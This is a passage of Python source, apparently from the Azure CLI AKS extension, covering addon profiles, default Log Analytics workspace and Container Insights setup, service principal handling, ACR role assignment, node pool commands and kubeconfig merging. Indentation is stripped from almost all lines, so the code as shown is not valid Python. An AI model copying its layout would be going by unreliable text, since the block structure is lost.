# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_agent_pool_node_image(client, resource_group_name, cluster_name, agent_pool_profile, no_wait):
instance = client.get(resource_group_name, cluster_name, agent_pool_profile.name)
instance.node_image_version = 'latest'
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, agent_pool_profile.name, instance)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None,
appgw_subnet_id=None, appgw_watch_namespace=None, disable_sgxquotehelper=False):
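    """Translate the comma-separated --enable-addons string into a dict of ManagedClusterAddonProfile objects, raising on unrecognized addon names."""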
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "true"})
if disable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "false"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
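    """Return the resource ID of the subscription's default Log Analytics workspace for the resource group's region, creating the workspace and its resource group if they do not exist yet."""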
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
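    """Deploy the ContainerInsights solution into the Log Analytics workspace referenced by the omsagent addon profile."""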
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
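    """Load a previously stored service principal for this subscription from aksServicePrincipal.json, or create and persist a new one when none was supplied."""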
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
                               'Are you an Owner on this subscription?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count can only be used together with --enable-cluster-autoscaler, please also specify that flag')
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
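    """Resolve the ACR by resource ID or name and grant (or, when detach=True, revoke) the 'acrpull' role for the given client ID."""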
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
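# Illustrative invocation (placeholder names):
#   az aks nodepool add -g MyResourceGroup --cluster-name MyManagedCluster -n nodepool2 --node-count 3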
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
                raise CLIError('Taint does not match allowed values. Expected a value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,):
from knack.prompting import prompt_y_n
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade the node image version. If you only want to upgrade the node image version, please use "--node-image-only" only.')
instance.orchestrator_version = kubernetes_version
if node_image_only:
msg = "This node image upgrade operation will run across every node in this node pool and might take a while, " \
"do you wish to continue? "
if not prompt_y_n(msg, default="n"):
return None
instance.node_image_version = 'latest'
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_watch_namespace=None, disable_sgxquotehelper=False, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
disable_sgxquotehelper=disable_sgxquotehelper, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
monitoring = 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
disable_sgxquotehelper=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
elif addon.lower() == CONST_INGRESS_APPGW_ADDON_NAME.lower():
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon.lower() == CONST_CONFCOM_ADDON_NAME.lower():
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "true"})
if disable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "false"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
else:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
